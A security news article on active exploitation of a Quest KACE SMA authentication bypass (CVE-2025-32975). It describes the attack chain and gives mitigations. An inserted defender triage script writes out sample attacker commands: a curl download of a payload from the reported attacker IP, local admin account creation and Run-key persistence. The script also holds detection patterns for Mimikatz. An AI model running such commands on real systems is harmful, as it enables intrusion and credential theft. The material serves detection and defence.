Arctic Wolf warns of active exploitation of CVE-2025-32975, a critical authentication bypass vulnerability in Quest KACE SMA systems that enables complete administrative takeover.
Threat actors are actively exploiting a critical vulnerability in Quest KACE Systems Management Appliance (SMA) to compromise enterprise environments, according to cybersecurity firm Arctic Wolf. The flaw, tracked as CVE-2025-32975 with a maximum CVSS score of 10.0, enables attackers to bypass authentication and gain complete administrative control over unpatched systems exposed to the internet.

Active Exploitation Campaign Detected
The malicious activity was first observed the week of March 9, 2026, targeting customer environments where KACE SMA instances remained unpatched. Arctic Wolf noted that the exploitation patterns are consistent with CVE-2025-32975 attacks, though the ultimate objectives of the threat actors remain unclear.
The vulnerability allows attackers to impersonate legitimate users without valid credentials, effectively granting them administrative privileges. Quest Software addressed the flaw in May 2025, releasing patches for multiple versions including 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4).
Attack Chain and Tactics
After exploiting the authentication bypass, attackers have been observed executing a sophisticated attack chain:
- Initial Foothold: Threat actors weaponize the vulnerability to seize administrative accounts and execute remote commands
- Payload Delivery: Base64-encoded payloads are downloaded from external servers (specifically 216.126.225[.]156) using curl commands
- Privilege Escalation: Additional administrative accounts are created via "runkbot.exe," a background process associated with the SMA Agent
- Persistence Mechanisms: Windows Registry modifications are made through PowerShell scripts for potential persistence or system configuration changes
Post-Exploitation Activities
The attackers have demonstrated advanced post-exploitation capabilities, including:
- Credential Harvesting: Deployment of Mimikatz for extracting authentication credentials from memory
- Network Discovery: Enumeration of logged-in users and administrator accounts using commands like "net time" and "net group"
- Lateral Movement: Obtaining Remote Desktop Protocol (RDP) access to critical infrastructure including backup systems (Veeam, Veritas) and domain controllers
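A defender-side triage script for the attack chain and post-exploitation behaviours listed above, added here as an example (not code from Arctic Wolf, Quest or the article). The process-creation events are constructed, the rule patterns and the two-category threshold are my own assumptions, and the only indicator taken from the report is the download host; the point is to correlate several weak signals on one host rather than alert on any single command.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (not real telemetry), one per line:
# timestamp|host|parent_image|command_line
SAMPLE_EVENTS = """\
2026-03-10T02:14:07Z|ws-042|runkbot.exe|curl -s http://216.126.225.156/p.b64 -o C:\\Temp\\p.b64
2026-03-10T02:14:15Z|ws-042|runkbot.exe|net user svc_kace P-placeholder /add
2026-03-10T02:14:16Z|ws-042|runkbot.exe|net localgroup administrators svc_kace /add
2026-03-10T02:15:02Z|ws-042|powershell.exe|powershell Set-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name upd -Value C:\\Temp\\p.ps1
2026-03-10T02:16:40Z|ws-042|cmd.exe|net group "Domain Admins" /domain
2026-03-10T08:00:00Z|ws-017|runkbot.exe|msiexec /i C:\\Temp\\agent_update.msi /qn
2026-03-10T08:05:00Z|ws-017|explorer.exe|net time \\\\dc01
"""

# Download host named in the Arctic Wolf report; every other rule is behavioural.
REPORTED_C2 = "216.126.225.156"

# (category, regex over "parent_image|command_line"); categories mirror the reported chain.
RULES = [
    ("payload_download", re.compile(r"^runkbot\.exe\|.*\bcurl\b", re.I)),
    ("reported_c2", re.compile(re.escape(REPORTED_C2))),
    ("account_creation", re.compile(r"^runkbot\.exe\|.*\bnet\s+(user|localgroup)\b.*\s/add\b", re.I)),
    ("registry_persistence", re.compile(r"^powershell\.exe\|.*(Set-ItemProperty|New-ItemProperty|reg\s+add).*\bHK(LM|CU)\b", re.I)),
    ("credential_access", re.compile(r"mimikatz|sekurlsa", re.I)),
    ("recon", re.compile(r"\bnet\s+(group|time)\b", re.I)),
]

def match_event(line):
    """Return (host, [matched categories]) for one event line."""
    ts, host, parent, cmd = line.split("|", 3)
    subject = f"{parent}|{cmd}"
    return host, [name for name, rx in RULES if rx.search(subject)]

def triage(events, min_categories=2):
    """Group hits per host. A host with at least min_categories distinct categories is
    reported as a probable post-exploitation chain; a lone hit stays a weak signal."""
    hits = defaultdict(set)
    for line in events.strip().splitlines():
        host, cats = match_event(line)
        hits[host].update(cats)
    return {h: ("probable_chain" if len(c) >= min_categories else "weak_signal")
            for h, c in hits.items() if c}

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS).items():
        print(host, verdict)
```

The SMA agent legitimately runs installers and admins legitimately run "net time", so ws-017 is reported only as a weak signal while ws-042, which chains a download, account creation, a Run-key change and domain recon, is escalated.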
Mitigation Recommendations
Administrators are strongly advised to take immediate action:
- Apply Patches Immediately: Install the latest KACE SMA updates for affected versions
- Network Segmentation: Avoid exposing SMA instances directly to the internet
- Access Controls: Review and restrict administrative account privileges
- Monitoring: Implement enhanced logging and monitoring for suspicious activities
- Backup Security: Ensure backup infrastructure is properly isolated and secured
Broader Context
The exploitation of CVE-2025-32975 highlights the ongoing risks associated with internet-exposed management systems. KACE SMA is widely used for endpoint management, software distribution, and patch management across enterprise environments, making it an attractive target for threat actors seeking broad network access.
This incident follows a pattern of critical vulnerabilities in enterprise management tools being actively exploited in the wild, emphasizing the importance of timely patching and proper network architecture design to minimize attack surfaces.
Organizations running unpatched KACE SMA systems should prioritize remediation efforts, as the combination of authentication bypass and administrative access provides attackers with the means to compromise entire IT infrastructures.
